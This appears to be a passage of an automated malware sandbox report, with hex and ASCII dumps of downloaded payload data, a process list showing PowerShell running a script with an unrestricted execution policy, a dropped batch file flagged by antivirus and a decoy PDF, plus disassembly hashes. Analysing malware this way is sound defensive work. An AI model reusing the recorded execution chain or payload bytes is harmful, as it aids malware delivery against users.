9b 12 40 5d 5d f1 f3 a8
                                                                    Data Ascii: y9! nR=AN6nNt|x$%5-}Y[uRu,^H09p6Q@',=BaB?)_*f"a2'Hv0)Qn6a244MKM3|mw1fAD^"xX6`=c6'yZa"B&<TPujSrS_`@]]
                                                                    2023-06-01 10:14:19 UTC437INData Raw: 25 d7 eb 7b 34 de 9a 1c 7a 11 ba b2 2c ef b9 c6 72 2d d1 f0 fc 3a 37 67 90 83 0a ef 9e 22 e5 79 36 f0 60 d8 fe 1e ed 4a b5 08 f6 51 1d 1f 99 01 e1 c9 f7 5a 6b c0 af 0d 90 fa de 0c 5c c3 4f 49 45 26 ac e0 ae 23 51 d9 b8 4e 73 5e 04 c6 87 1a b3 c8 b2 87 36 b4 a1 e9 dc 1c c0 ed e6 8a 3b e8 9f 63 ab 99 5e 6c 57 7a 78 9d d6 7a e4 69 ae 9c 90 21 3a 58 d1 f1 02 7a 84 24 18 d8 8b 7a f2 9a 0f ca 98 33 f7 23 37 9f 5a 82 73 73 25 7b 3c 08 b3 6c 6e 4a 20 15 c0 c3 b0 3f d1 04 e3 10 2f df 78 71 52 d3 a1 53 94 40 f6 c2 d7 bc cc b9 08 16 c8 ea e9 8e f3 a8 d4 60 c7 4f bf 74 fc 07 ca 46 a8 17 2a 75 69 06 58 b2 82 b1 da fe f8 f5 6c ce bb 66 34 42 a8 44 22 23 e9 ec a9 4e 28 10 84 49 22 ae 21 d1 9d 94 4c b3 74 0e 70 9a 5b 02 ce 41 79 b3 87 b1 0e 92 ca 6a 99 90 7f 58 5e 05 59
                                                                    Data Ascii: %{4z,r-:7g"y6`JQZk\OIE&#QNs^6;c^lWzxzi!:Xz$z3#7Zss%{<lnJ ?/xqRS@`OtF*uiXlf4BD"#N(I"!Ltp[AyjX^Y
                                                                    2023-06-01 10:14:19 UTC445INData Raw: 1d b2 1b db d1 9f 69 41 1a de ff 0f 8e a4 99 8c 7c b8 5a 6f ec ca e7 95 11 52 30 7f 61 79 5f 4d f9 8d 30 76 fe 0f f2 fe 42 49 c9 64 91 b3 be 11 6a 41 f3 28 68 e6 e3 e4 18 ea 9f ca d6 4c a9 e9 13 fa 6d 9a 2d a0 97 7b f1 6e 77 86 08 fb 6b a8 f2 6a 15 f3 eb 62 de a2 a8 7d 9f 14 30 f2 1d 0b 77 13 33 fe 4f 0b e3 64 5c 51 70 51 5c ee e7 c9 2a a6 4c 49 f4 84 e4 4d c0 a0 9a d7 9a 6d 37 9f 73 e7 c2 dd 7b dc 63 70 b4 1f f3 4a 11 43 72 f2 5a 56 83 24 80 c5 a4 34 4c 94 64 8c e8 04 e1 77 2a a8 0c 9f ec ec 7d bb a0 a6 62 54 f1 d0 f1 f7 f9 b7 5d 77 8d 44 6f d0 96 ae c0 43 a8 06 64 97 38 1a 4f 61 86 36 ce 73 db 85 85 58 f4 12 73 22 6b 16 e1 2e 5c 43 47 03 2c e8 78 2f 3d 57 39 1c 7e 21 ce b4 f8 d7 fa 37 70 37 ea 0c cf 5e 07 83 80 89 b3 4c c0 db f8 85 ec 76 1a f9 cc a0 75
                                                                    Data Ascii: iA|ZoR0ay_M0vBIdjA(hLm-{nwkjb}0w3Od\QpQ\*LIMm7s{cpJCrZV$4Ldw*}bT]wDoCd8Oa6sXs"k.\CG,x/=W9~!7p7^Lvu
                                                                    2023-06-01 10:14:19 UTC453INData Raw: 80 8c 0e 28 4d da 34 f0 88 e1 7a 78 f3 28 60 e2 68 3d 54 b5 69 d6 e0 69 06 cc aa 36 6f aa 57 a6 60 ff 49 f6 1b 83 6a 6e b0 2c 9e 15 c3 cb 5f d9 1a ce dc d5 17 5c c8 9a ee 52 b7 14 da 36 c7 28 83 c9 a3 f3 33 ce 68 c5 9b 3f 87 1c c3 1e af f8 03 bd d8 a0 7f fc 93 cf e7 c7 73 ff 70 8d 0a aa 34 ee 47 60 71 24 d0 50 bd 70 08 9a ed 22 34 a9 88 35 5f 89 5b 7b 25 3c eb b7 64 57 c5 4c bb 8f f3 98 0e 27 39 b0 6e 6b c2 96 9d 9b d9 f1 8c 21 91 aa 34 09 9b 82 7e 44 26 78 ee 7b 4e 9c bd 4f 5d a8 73 d0 cd 1e 3f 14 a6 e2 c6 ca 88 42 62 23 03 f9 7b 02 3e 3f 90 c8 f0 d9 f4 88 a9 3f 79 8a f9 0c f0 d3 bc 5a 37 f6 b7 cf b3 d0 4a 34 69 00 10 b8 f7 97 d5 5c 05 4d 3e 5f 3a 7b a0 7c 1f 1d 51 2d dd 98 21 7e 7d 04 a2 de 5f 8b 65 03 51 4d 84 6f 6f 60 61 4e 18 05 2b 33 fa c4 21 9a 70
                                                                    Data Ascii: (M4zx(`h=Tii6oW`Ijn,_\R6(3h?sp4G`q$Pp"45_[{%<dWL'9nk!4~D&x{NO]s?Bb#{>??yZ7J4i\M>_:{|Q-!~}_eQMoo`aN+3!p
                                                                    2023-06-01 10:14:19 UTC461INData Raw: 87 a1 e0 74 f7 ae 7e e6 6e 03 d2 dc 84 be 22 9c a6 8e 00 6b a4 e5 8a ff fd ed 8c fa 80 8e 38 71 b7 fb 97 52 8b 6a de 1a b4 eb 0f dd 3f 65 d8 d0 02 f8 0a 98 7b c3 1b 3d b6 e4 d8 7e 57 f6 c0 c5 2e 43 62 31 f9 9f c6 fc e4 8b b6 60 18 f1 24 f3 62 02 84 c3 39 85 b6 02 ea f1 39 5f 24 9e d6 08 51 c3 8b 2d ad 7a 4a b3 de eb 86 8a 17 87 2c 76 62 37 31 32 cf 31 6e 82 a3 b8 ed d9 ad 45 21 b6 0f d0 ba 5e 8d b3 6c 23 43 2a cd 63 af 63 86 44 b4 cf 1b d3 57 5e c6 42 62 5b 87 b1 ea 82 6a 4c 76 33 b2 50 41 29 1d 29 96 f8 b5 f2 fa a9 58 fb f0 34 05 d4 43 54 81 48 ef 72 5b cc 86 d8 4f ed 99 f1 b9 f5 8c ec 98 b8 85 f0 8f 15 b1 66 05 e7 e8 74 80 15 7f d3 d1 8e 85 eb 45 a6 f0 42 7e 76 ac 1e 59 07 4f 33 cd c9 5a ed 25 6d f6 7d 28 09 f3 10 7a 75 13 e2 14 f4 66 88 59 63 34 c8 33
                                                                    Data Ascii: t~n"k8qRj?e{=~W.Cb1`$b99_$Q-zJ,vb7121nE!^l#C*ccDW^Bb[jLv3PA))X4CTHr[OftEB~vYO3Z%m}(zufYc43
                                                                    2023-06-01 10:14:19 UTC469INData Raw: f7 f5 ee b5 2f 07 5e 09 d7 cc 81 13 ea b1 dc 29 98 fa df 2b 80 1e d1 18 bb 89 ee 08 80 e8 f3 58 a1 05 3e 59 50 9c 98 e4 2f 06 44 af f3 ed fe 05 12 41 59 0c 58 30 20 4e 46 cf c1 d7 f6 ca 9e da b6 df 92 72 0b 47 28 40 99 cd 77 6d 93 04 61 24 a3 d0 ae 2d 7e db e3 00 1b f7 36 84 c4 3a 16 c7 45 47 f6 c8 04 08 f5 af 9b 3a e8 76 ab b1 bf d6 69 06 5c 37 25 d8 ba 48 0c d8 c2 1d 7b 5f 4f 59 5b 93 a6 5b 7d b7 79 a5 fc 4d 78 ad cb ed 64 45 ee 35 92 0c 9f 10 71 6a 26 05 b0 8f 53 f0 28 34 49 55 d1 75 b8 57 e4 d1 d8 0e 67 3c 6d 4c 2a fa a3 f2 f9 6d a7 6e c2 c7 2f c9 f5 4f 89 91 39 06 4b e0 1e d7 68 d7 eb c9 d6 63 8e 11 56 54 12 c9 09 c8 25 ec f0 82 30 f9 ae 7b 4f 96 6a 44 89 e8 c3 73 dd 4f dc c5 f0 4f e6 85 b9 b3 05 77 a9 84 08 ed 44 77 90 a7 b4 c9 e3 bf 9a 7d 5c 1e e8
                                                                    Data Ascii: /^)+X>YP/DAYX0 NFrG(@wma$-~6:EG:vi\7%H{_OY[[}yMxdE5qj&S(4IUuWg<mL*mn/O9KhcVT%0{OjDsOOwDw}\
                                                                    2023-06-01 10:14:19 UTC476INData Raw: e8 f3 f6 c4 2e e6 6f 34 04 ec d4 55 d6 28 ad 81 31 7a 42 5e be 7d 18 41 f4 f6 3e f6 a4 7a 6f 67 1b 28 99 b5 b8 a0 3c b1 c8 4f 9c c7 aa 11 d3 c6 cd 5a e4 81 4c c5 e2 9d 97 c3 78 b0 73 5f b9 5c e6 a0 48 b1 03 7d 8b b9 65 98 d1 65 50 3a e8 a3 09 63 49 8a 3b e1 df 70 27 c7 da d9 18 13 30 2c ad bc 40 4b dc 73 d7 2d 80 ab 2d a0 d2 29 4e f5 cb 2b 81 89 0d 95 89 00 55 02 38 b6 2e f1 a0 d2 bb 62 55 b0 08 06 61 59 a1 3a 3e 1c 2a fc fa 21 50 ec 48 07 42 14 db e2 b7 2d f9 69 80 2a ba ff 2b 73 b2 5f d4 2c 68 94 db 2d c9 19 66 b6 e9 05 3d a4 d7 21 75 a0 bb 5d f5 fd fb 51 f6 70 4d 21 97 d0 8f f1 e2 37 c0 17 91 3f dd fb 36 f4 47 91 2f 47 cd e9 89 80 ce ae 4e 89 78 2f d9 a4 d2 6d 05 09 0d 9f 9e 4f f6 a6 ec 83 fd 07 69 09 48 75 ea 55 73 ac bf f5 8e 63 a1 da 6f e3 6e 8e 73
                                                                    Data Ascii: .o4U(1zB^}A>zog(<OZLxs_\H}eeP:cI;p'0,@Ks--)N+U8.bUaY:>*!PHB-i*+s_,h-f=!u]QpM!7?6G/GNx/mOiHuUscons
                                                                    2023-06-01 10:14:19 UTC484INData Raw: c2 e5 4a 31 87 12 d7 1b 1d 98 8d 2a 7d 00 55 39 f8 4c c3 f9 7b 91 51 d3 90 42 fc 28 b9 ce ce be 97 e6 a2 07 e8 7f 24 41 1d 43 fe 1b 91 26 7a b9 f1 c0 ee 87 bf d4 72 24 8e 3c bd cc ba 26 3f df 34 09 c9 fe 56 ae ba 8e bb d4 e6 b9 98 55 1d d2 54 28 bf a6 65 cb 88 14 08 20 3a 37 e0 3d 4c aa bb e4 d4 46 73 15 ba 7d 73 cb ec 1d 44 a7 6a 4a 6d c9 ec ad 52 f0 57 46 76 0b 20 1b cd 60 e8 16 56 52 99 74 5a af a8 70 16 41 19 50 66 b2 52 a7 5b e3 ba 4f 21 e6 60 5f c2 cf 91 b3 3e 26 fa 19 f7 e0 f4 73 82 67 b7 07 03 70 1e fa 97 9f a8 a6 6d 12 76 56 59 60 b1 b4 66 e7 e5 e4 9c 94 ad 88 e0 54 e0 6f 4a f7 e2 b8 81 96 e3 96 c6 0f 95 dd 0d 30 99 e6 ca cf 0e 7f a1 0d f9 d8 a7 2f a3 a4 b2 f7 77 4f 8e fb c7 18 43 4a 91 47 a9 83 64 4e 18 35 4b f9 c0 64 68 0d bc 1d ff 9e 9a 09 4c
                                                                    Data Ascii: J1*}U9L{QB($AC&zr$<&?4VUT(e :7=LFs}sDjJmRWFv `VRtZpAPfR[O!`_>&sgpmvVY`fToJ0/wOCJGdN5KdhL
                                                                    2023-06-01 10:14:19 UTC492INData Raw: 72 d9 69 fd 10 6e 8d 0d 95 05 71 9b f8 19 36 57 ac 99 6f 1b 51 6c 97 d9 d4 a4 ee 15 72 73 a8 c9 24 25 42 7b 67 3c 53 b8 d5 e9 1f a5 8d aa 5e f4 75 4a 15 11 20 33 f4 8b 1e 74 61 53 df 74 31 51 fa d2 82 79 03 f0 f2 c1 8b c0 34 26 ce fc e6 78 4e 59 40 e5 43 7f d6 29 1a ef 70 26 96 89 5a 96 a2 fa 65 16 0f e7 64 1f 27 ff ca 26 09 c1 8b 7d 83 f2 72 7e 84 50 56 07 83 d8 36 dc b4 9b ce 01 d9 cc e2 a4 a8 91 24 eb 8a cf 76 47 ae da a1 d2 e4 7c ce 6d 25 0f 6c 76 3f 66 d9 c1 a2 bc 80 21 26 36 bc 32 af 4b a9 57 d7 36 33 c1 d0 21 88 17 3c 6c 4e d5 af ad 49 8b 27 6e 4a 51 da 98 e6 2b fe 64 2e a2 f1 76 03 b8 f8 85 81 ff 3f 5d e7 11 df 1d 14 da 17 f2 21 88 11 cb 72 c8 22 39 b5 27 8f fa 14 15 1c be bd 3b 40 c8 49 94 40 e0 b0 d6 fe 76 8c de f5 dc 2f d4 3d d6 4e 41 9a b0 23
                                                                    Data Ascii: rinq6WoQlrs$%B{g<S^uJ 3taSt1Qy4&xNY@C)p&Zed'&}r~PV6$vG|m%lv?f!&62KW63!<lNI'nJQ+d.v?]!r"9';@I@v/=NA#
                                                                    2023-06-01 10:14:19 UTC500INData Raw: e8 23 bb 40 a9 e2 f0 c5 03 0d 4d 83 2a 6b ce 8d 42 c1 a3 32 32 6a ba 43 ad 6f 93 5b f7 86 78 03 f0 98 8c 78 4d 39 0f f0 d5 24 9e 49 4c 8a 01 c1 3c 60 31 47 4e 83 18 98 45 d6 90 dd 2a 58 79 95 16 cb c6 3e f1 a2 e7 30 c5 e7 a9 c9 ab ad 9a 3c a3 0c f4 1a 29 a5 1b 73 95 fd 38 71 77 89 92 34 93 ea 1d f5 21 a9 32 b5 4a 6b 61 a3 89 4f c6 25 20 57 6c da 56 b2 0e 99 5d f7 c4 da 4a ef 51 36 a9 43 f1 02 79 9d 62 c3 0d a6 3e f0 fb 37 f7 49 63 d1 f1 61 3a 12 91 9a de 66 2a e0 eb ef da f2 a6 40 53 bc f6 95 14 6e 5e 45 06 3a 11 e1 94 43 1b 9c b2 22 7c 57 c4 6e ec 2c 97 33 cc b8 0a 36 cb 41 2b 06 89 bf 50 7f 2e b3 17 cd 9e 0c 31 b1 db b7 6b a5 54 43 14 53 94 f8 ae c7 eb 18 71 6c 74 d1 1f 17 5b 1a f2 32 72 17 82 50 d6 32 93 69 ca 5e d1 3f 11 67 16 0d fb 2e b7 c5 ff 4e 8d
                                                                    Data Ascii: #@M*kB22jCo[xxM9$IL<`1GNE*Xy>0<)s8qw4!2JkaO% WlV]JQ6Cyb>7Ica:f*@Sn^E:C"|Wn,36A+P.1kTCSqlt[2rP2i^?g.N
                                                                    2023-06-01 10:14:19 UTC508INData Raw: ad 74 f3 15 bc 48 70 68 a7 81 63 3f 9e 43 a6 9f 19 53 ba 2b a6 81 52 9d 60 df 61 27 5e 75 e4 ea 8f 92 b4 36 d3 19 2e 2a 24 4b d8 8a 92 13 3b 39 32 4c 15 47 59 74 73 26 f9 1d dd 0f 6f 80 2b 3a 63 a6 c1 32 5a 15 43 be 5f 1d 21 dd 39 df 96 53 30 8f f5 63 ad b3 14 c8 7d a3 7c 66 8a 6a 09 6f 6f 72 ba 28 0c 28 0f 48 4b be 19 d4 6a 25 f6 22 24 5d 11 db b6 b0 22 9b dc 9a 5e 4a 74 17 3f 76 90 91 c5 4a 0c 8a c0 0c bb 52 c9 d6 f1 6c 2f 8a b9 52 38 ab c3 3d 16 74 87 d7 52 b8 44 6f 52 57 8b 44 81 2a e8 f6 99 d8 bc f0 fd 34 ee 16 17 4d 82 9d 15 a5 4b af e3 5e e0 da 67 4a de 67 f0 97 c0 e2 37 25 c9 36 7a 00 09 03 38 de 15 a2 a1 8b 2b fb e6 2d 74 df 3d e8 d4 78 37 95 7e ca 48 4b c1 f2 ee c4 2e 4e f2 33 ce 41 4c 58 2a ff 83 2f cb e2 d5 45 a4 42 bf 4a 66 28 72 67 1c 43 72
                                                                    Data Ascii: tHphc?CS+R`a'^u6.*$K;92LGYts&o+:c2ZC_!9S0c}|fjoor((HKj%"$]"^Jt?vJRl/R8=tRDoRWD*4MK^gJg7%6z8+-t=x7~HK.N3ALX*/EBJf(rgCr
                                                                    2023-06-01 10:14:19 UTC515INData Raw: 9b 40 6f dd 07 2a e4 6d 59 55 3c 66 46 ed e1 14 60 bf 8d c8 a3 8c f9 c1 21 69 1a 48 c3 78 63 c0 a1 e5 c4 b0 e3 1c 78 bf ca 02 47 a8 a8 cb 30 dd c8 44 ef 66 5e c9 46 b2 82 e1 3a f1 01 c3 ce 50 f3 1f 1c c1 ff b1 af 7a df b7 ba 4d 72 f5 ba e4 76 c7 d5 76 64 c7 e5 48 05 38 9b 54 f6 1d b3 89 45 a7 18 90 9c ed d3 7e 96 d4 68 d6 b6 4f e8 e3 5f c0 29 bd 22 cd 6b 25 f1 1d d1 79 0c ac bf ff f4 70 13 22 7a b0 c3 13 65 c7 f0 fd e8 d8 d3 dd 81 d8 d9 4b 2a fe 87 4d 2b b3 96 52 3d e3 96 e2 51 7f 4d 82 22 c0 c9 98 63 00 e5 cb 9d 05 b6 3a 16 a4 7d 52 35 c4 d0 e7 c0 34 a1 18 b7 4a b9 4d 18 9e b0 5c 7c a0 3d 93 a4 c1 f8 41 96 76 5c 3b 8a a2 72 fb 9d 86 26 45 25 68 c3 d5 70 de 0f 11 73 fa 16 0b 2e 2f 30 68 9a 21 fd a2 56 22 ad 67 c8 68 c1 7a a2 f0 95 f3 f7 81 6e 2a 85 cb 9e
                                                                    Data Ascii: @o*mYU<fF`!iHxcxG0Df^F:PzMrvvdH8TE~hO_)"k%yp"zeK*M+R=QM"c:}R54JM\|=Av\;r&E%hps./0h!V"ghzn*


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:12:14:15
                                                                    Start date:01/06/2023
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\zp.ps1
                                                                    Imagebase:0x7ff7466a0000
                                                                    File size:447488 bytes
                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:1
                                                                    Start time:12:14:15
                                                                    Start date:01/06/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6da640000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:2
                                                                    Start time:12:14:19
                                                                    Start date:01/06/2023
                                                                    Path:C:\Users\Public\iqb3.bat
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\iqb3.bat"
                                                                    Imagebase:0x400000
                                                                    File size:535909 bytes
                                                                    MD5 hash:849ACB6881494898FF4A18A4A0FBDB43
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 11%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Target ID:3
                                                                    Start time:12:14:34
                                                                    Start date:01/06/2023
                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdf
                                                                    Imagebase:0x180000
                                                                    File size:2571312 bytes
                                                                    MD5 hash:B969CF0C7B2C443A99034881E8C8740A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Target ID:5
                                                                    Start time:12:14:42
                                                                    Start date:01/06/2023
                                                                    Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                    Imagebase:0x3b0000
                                                                    File size:9475120 bytes
                                                                    MD5 hash:9AEBA3BACD721484391D15478A4080C7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00007FFC9FDF4475 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X6+m
                                                                      • API String ID: 0-1248363007
                                                                      • Opcode ID: 8c40f9ffb82aa31d4738e47cbb21d3faaae26b44258979ef6072ecbe2097bf49
                                                                      • Instruction ID: 39fdca6f7e677e659e288359a6424f3281674e1b42faae0c414255fef1c2e404
                                                                      • Opcode Fuzzy Hash: 8c40f9ffb82aa31d4738e47cbb21d3faaae26b44258979ef6072ecbe2097bf49
                                                                      • Instruction Fuzzy Hash: 25C1593291C69D4FF7A9DB2888245B5BFA0EF56310B2801FAD45DC71D3EA14A815C3B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FDF454A Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X6+m
                                                                      • API String ID: 0-1248363007
                                                                      • Opcode ID: 78f2cd7f543c63310fc0207dade097b05e335a29c308aba2fd69ef69ee2a1192
                                                                      • Instruction ID: 43eff9089b3ee2557bc81176ad86f831c4b487763190a9aabbeb37badfbfeb09
                                                                      • Opcode Fuzzy Hash: 78f2cd7f543c63310fc0207dade097b05e335a29c308aba2fd69ef69ee2a1192
                                                                      • Instruction Fuzzy Hash: 13510763A1D69E4FFBAADB288460578BF91EF16310B2800FAD049CB2D3ED089C15C371
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FDF126D Relevance: .5, Instructions: 456COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b13a7776f2a8172ed4ba5fb49d410bb434989766234c819bcd4fbc34daa76622
                                                                      • Instruction ID: eb6ed5c96a12280fa93469e73558ee5c160f9941b2eb5167a43e5754f0c7875e
                                                                      • Opcode Fuzzy Hash: b13a7776f2a8172ed4ba5fb49d410bb434989766234c819bcd4fbc34daa76622
                                                                      • Instruction Fuzzy Hash: 78D1F722A1DBDA0FF76ADA2858655B57FE1EF46310B0801FFD049C71E3E918A815C3A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD22860 Relevance: .4, Instructions: 379COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc47765f848f4835fcd5c262142ffd9b5bb602b9ad0ac9e17d16f607f8c58a60
                                                                      • Instruction ID: dedecc1e14d7fd8666511aa529363a4b6fc985971fbffda6c4feab5aae17607c
                                                                      • Opcode Fuzzy Hash: dc47765f848f4835fcd5c262142ffd9b5bb602b9ad0ac9e17d16f607f8c58a60
                                                                      • Instruction Fuzzy Hash: 95A17A3260C6994FE719EB2CD8955F5BBE0EF9732071401BEE089C7193EE25A847C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD2440B Relevance: .4, Instructions: 360COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef1af23c88b600c0b181f9504fcf692f14f1661938e5ce1d264cc2c9f9f20d44
                                                                      • Instruction ID: b2fb36043ce0b50a284b0cc2e41834d107a6adccf0e2d078026b9d4b0f1d9299
                                                                      • Opcode Fuzzy Hash: ef1af23c88b600c0b181f9504fcf692f14f1661938e5ce1d264cc2c9f9f20d44
                                                                      • Instruction Fuzzy Hash: FFC14D31A0895D8FDF98DF58C455AE97BE1FFA8300F244169D409D729ADA74E881CBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FD2296C Relevance: .1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622394555.00007FFC9FD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FD20000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fd20000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96baf38f32df5611c62a650f1b6a668fe8c6af8d6b4f0aa67c923f745fa87ec3
                                                                      • Instruction ID: 5d302add2c4eb798c04cfe75e235027a4a00753322a5be5517f75d156624f02f
                                                                      • Opcode Fuzzy Hash: 96baf38f32df5611c62a650f1b6a668fe8c6af8d6b4f0aa67c923f745fa87ec3
                                                                      • Instruction Fuzzy Hash: E631033261CA494FE76CDE1CC8969B177E1EB99315B14017DE48AC3652EE22FC42CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FDF13F4 Relevance: .1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3b09218e87e2bbd9e6b70a9a46f21d4cf441584f63a1f07baa6e807b35f9687b
                                                                      • Instruction ID: 0f7194351d35cbe0ff49f1d858f357d3f703616f4a9d8c2faa36b779951e23ea
                                                                      • Opcode Fuzzy Hash: 3b09218e87e2bbd9e6b70a9a46f21d4cf441584f63a1f07baa6e807b35f9687b
                                                                      • Instruction Fuzzy Hash: DD214823A2DAAE0FF7BDDA284421574AAD2EFC471075811BAD40DC71D2EE18EC15C3A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FDF2185 Relevance: .1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ef0ca10a1d089c792d2fc3a447911a77040ba3239ba89c16649b97a3686d3550
                                                                      • Instruction ID: 87952b10c416d549c2a76e306c4af623082ac2655a5e7c95ec06842264ef4ad3
                                                                      • Opcode Fuzzy Hash: ef0ca10a1d089c792d2fc3a447911a77040ba3239ba89c16649b97a3686d3550
                                                                      • Instruction Fuzzy Hash: EC112453E1D6DE0FF7AAE6280825578AA91DF533517A800FAD059CB1D3EC081C08C376
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFC9FDF2135 Relevance: .1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.622842397.00007FFC9FDF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9FDF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffc9fdf0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8197cbf908d6f1dcd79a8845e6d55810eadadaeedb01a5a72aa90a19d10fb9de
                                                                      • Instruction ID: 91278c00b99f41240c128997f530db519c2aaaf08344a477c8f02cdf35d64ccd
